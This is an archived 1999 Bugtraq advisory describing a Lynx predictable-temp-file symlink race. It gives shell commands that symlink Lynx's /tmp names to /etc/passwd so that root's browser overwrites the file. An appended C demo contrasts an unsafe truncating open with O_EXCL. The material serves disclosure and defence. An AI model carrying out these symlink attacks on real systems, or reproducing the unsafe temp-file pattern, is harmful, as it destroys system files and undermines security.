[9470] in bugtraq
Lynx /tmp problem
daemon@ATHENA.MIT.EDU (Juan Diego Bolanos)
Thu Feb 11 13:23:02 1999
Date: Tue, 9 Feb 1999 20:57:30 -0500
Reply-To: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
From: Juan Diego Bolanos <diego@HERCULES.UNIVALLE.EDU.CO>
To: BUGTRAQ@NETSPACE.ORG
Hi Aleph,
please filter this if already posted....
------
Hello....
I have found a bug in all versions of Lynx, except the latest stable
release...
Lynx creates temporary files in /tmp in this way....
L[num proc]-xTMP.html
where
[num proc] is the process number on the machine
x is a number from 0 to 9
If I run lynx as any user, for example root, we see this:
earthworm:~$ ps
PID TTY STAT TIME COMMAND
91 1 SW 0:06 (bash)
94 4 S 0:05 -bash
95 5 SW 0:06 (bash)
3867 a3 S 0:00 pppd -detach defaultroute crtscts modem 192.168.2.6:
3870 3 SW 0:02 (ssh)
3894 4 T 0:00 lynx
3898 4 R 0:00 ps
Then the files in /tmp created by lynx will be:
L3894-0TMP.html
L3894-1TMP.html
L3894-2TMP.html
L3894-3TMP.html
L3894-4TMP.html
L3894-5TMP.html
L3894-6TMP.html
L3894-7TMP.html
L3894-8TMP.html
L3894-9TMP.html
If I make a symlink
from all of these files to any file in the system, for example....
earthworm:~$ cd /tmp
earthworm:/tmp$ ln -s /etc/passwd L3894-0TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-1TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-2TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-3TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-4TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-5TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-6TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-7TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-8TMP.html
earthworm:/tmp$ ln -s /etc/passwd L3894-9TMP.html
And now when root (in this example) tries to download a file, or presses the
backspace key to reach the history list, the file I have linked (in this
case /etc/passwd) will be replaced with it... and is now owned by root...
For example, I got this on my system...
earthworm:/tmp$ cat /etc/passwd
<head>
<title>Lynx History Page</title>
</head>
<body>
<h1>You have reached the History Page</h1>
<h2>Lynx Version 2.8rel2</h2>
<pre><em>You selected:</em>
<em>0</em>. <tab id=t0><a href="LYNXHIST:0">Internet Firewalls Frequently Asked Questions</a>
<tab to=t0>file://localhost/root/firefaq.html
</pre>
</body>
As you see, the file is lost now...
This bug is Lynx specific, so all OSes are vulnerable..
Fix: upgrade to the latest Lynx version. I have checked it, and it appears
to use L[proc num]-xTMP.html where x is from 0 to ???...
I hope it is already fixed; creating 100 symlinks is not too hard :)
The Lynx team knows about this already.
Bye...
Juan Diego
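
Added example, not part of the original post and not Lynx's code: the clobbering described above reproduced inside a private scratch directory, next to the `O_EXCL` form of the create call that refuses a pre-planted name. The function names, the sample file contents, and the assumption that the temporary file is opened create-or-truncate are constructed for illustration.

```c
#define _XOPEN_SOURCE 700   /* for mkdtemp() and symlink() */
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define ORIGINAL "root:x:0:0:constructed sample line\n"
#define PAGE     "<title>Lynx History Page</title>\n"

/* Assumed vulnerable pattern: a create-or-truncate open follows a symlink
 * that already sits under the predictable name and empties its target. */
static int create_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened: O_CREAT|O_EXCL fails with EEXIST if the name exists at all,
 * symlinks included, so nothing is followed or truncated. */
static int create_safe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_EXCL, 0600);
}

/* Plants a symlink named like a Lynx temp file that points at a victim
 * file, runs one creator on that name, and reports the outcome:
 * 1 = victim intact, 0 = victim overwritten, -1 = setup error. */
int victim_survives(int (*creator)(const char *)) {
    char dir[] = "/tmp/lynxdemoXXXXXX", victim[64], tmp[64], buf[64] = {0};
    if (!mkdtemp(dir)) return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(tmp, sizeof tmp, "%s/L3894-0TMP.html", dir);
    FILE *f = fopen(victim, "w");
    if (!f) return -1;
    fputs(ORIGINAL, f);
    fclose(f);
    if (symlink(victim, tmp) != 0) return -1;

    int fd = creator(tmp);              /* the application's temp-file open */
    if (fd >= 0) { ssize_t w = write(fd, PAGE, strlen(PAGE)); (void)w; close(fd); }

    f = fopen(victim, "r");
    if (f) { size_t n = fread(buf, 1, sizeof buf - 1, f); (void)n; fclose(f); }
    unlink(tmp); unlink(victim); rmdir(dir);
    return strcmp(buf, ORIGINAL) == 0;
}

int main(void) {
    printf("create-or-truncate: victim intact = %d\n", victim_survives(create_unsafe));
    printf("O_CREAT|O_EXCL:     victim intact = %d\n", victim_survives(create_safe));
    return 0;
}
```

`mkstemp()` combines the exclusive create with an unpredictable name, which also removes the need to guess which suffix is free.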